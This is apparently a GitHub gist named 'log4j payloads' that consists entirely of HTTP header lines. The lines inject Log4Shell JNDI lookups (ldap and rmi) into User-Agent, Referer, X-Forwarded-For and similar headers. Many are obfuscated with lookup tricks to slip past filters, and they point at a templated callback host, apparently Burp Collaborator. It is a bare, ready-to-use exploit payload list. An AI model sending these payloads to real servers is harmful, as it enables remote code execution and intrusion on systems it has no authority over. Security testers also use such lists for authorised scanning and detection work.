@incogbyte
Created February 4, 2022 19:22
log4j payloads
User-Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
X-Api-Version: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
X-Forwarded-For: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
Authentication: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
User-Agent: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
X-Api-Version: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
Referer: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
X-Forwarded-For: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
Authentication: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
X-Api-Version: ${jndi:ldap://${hostName}.{{burp}}/badClassName}
Referer: ${jndi:ldap://${hostName}.{{burp}}/badClassName}
X-Forwarded-For: ${jndi:ldap://${hostName}.{{burp}}/badClassName}
Authentication: ${jndi:ldap://${hostName}.{{burp}}/badClassName}
User-Agent: ${jndi:ldap://${hostName}.{{burp}}/badClassName}
Authentication: ${${::-j}${::-n}${::-d}${::-I}:${::-r}${::-m}${::-I}:${hostName}.{{burp}}/s2edwin}
User-Agent: ${${::-j}${::-n}${::-d}${::-I}:${::-r}${::-m}${::-I}:${hostName}.{{burp}}/s2edwin}
X-Api-Version: ${${::-j}${::-n}${::-d}${::-I}:${::-r}${::-m}${::-I}:${hostName}.{{burp}}/s2edwin}
Referer: ${${::-j}${::-n}${::-d}${::-I}:${::-r}${::-m}${::-I}:${hostName}.{{burp}}/s2edwin}
X-Forwarded-For: ${${::-j}${::-n}${::-d}${::-I}:${::-r}${::-m}${::-I}:${hostName}.{{burp}}/s2edwin}
User-Agent: ${${::-j}ndi:rmi://${hostName}.{{burp}}/ass}
X-Api-Version: ${${::-j}ndi:rmi://${hostName}.{{burp}}/ass}
Referer: ${${::-j}ndi:rmi://${hostName}.{{burp}}/ass}
X-Forwarded-For: ${${::-j}ndi:rmi://${hostName}.{{burp}}/ass}
Authentication: ${${::-j}ndi:rmi://${hostName}.{{burp}}/ass}
User-Agent: ${jndi:rmi://${hostName}.{{burp}}}
X-Api-Version: ${jndi:rmi://${hostName}.{{burp}}}
Referer: ${jndi:rmi://${hostName}.{{burp}}}
X-Forwarded-For: ${jndi:rmi://${hostName}.{{burp}}}
Authentication: ${jndi:rmi://${hostName}.{{burp}}}
User-Agent: ${${lower:jndi}:${lower:rmi}://${hostName}.{{burp}}/s2edwin}
X-Api-Version: ${${lower:jndi}:${lower:rmi}://${hostName}.{{burp}}/s2edwin}
Referer: ${${lower:jndi}:${lower:rmi}://${hostName}.{{burp}}/s2edwin}
X-Forwarded-For: ${${lower:jndi}:${lower:rmi}://${hostName}.{{burp}}/s2edwin}
Authentication: ${${lower:jndi}:${lower:rmi}://${hostName}.{{burp}}/s2edwin}
User-Agent: ${${lower:${lower:jndi}}:${lower:rmi}://${hostName}.{{burp}}/s2edwin}
X-Api-Version: ${${lower:${lower:jndi}}:${lower:rmi}://${hostName}.{{burp}}/s2edwin}
Referer: ${${lower:${lower:jndi}}:${lower:rmi}://${hostName}.{{burp}}/s2edwin}
X-Forwarded-For: ${${lower:${lower:jndi}}:${lower:rmi}://${hostName}.{{burp}}/s2edwin}
Authentication: ${${lower:${lower:jndi}}:${lower:rmi}://${hostName}.{{burp}}/s2edwin}
Referer: ${${lower:n}${lower:d}i:${lower:rmi}://${hostName}.{{burp}}/s2edwin}
X-Forwarded-For: ${${lower:n}${lower:d}i:${lower:rmi}://${hostName}.{{burp}}/s2edwin}
Authentication: ${${lower:n}${lower:d}i:${lower:rmi}://${hostName}.{{burp}}/s2edwin}
User-Agent: ${${lower:n}${lower:d}i:${lower:rmi}://${hostName}.{{burp}}/s2edwin}
X-Api-Version: ${${lower:n}${lower:d}i:${lower:rmi}://${hostName}.{{burp}}/s2edwin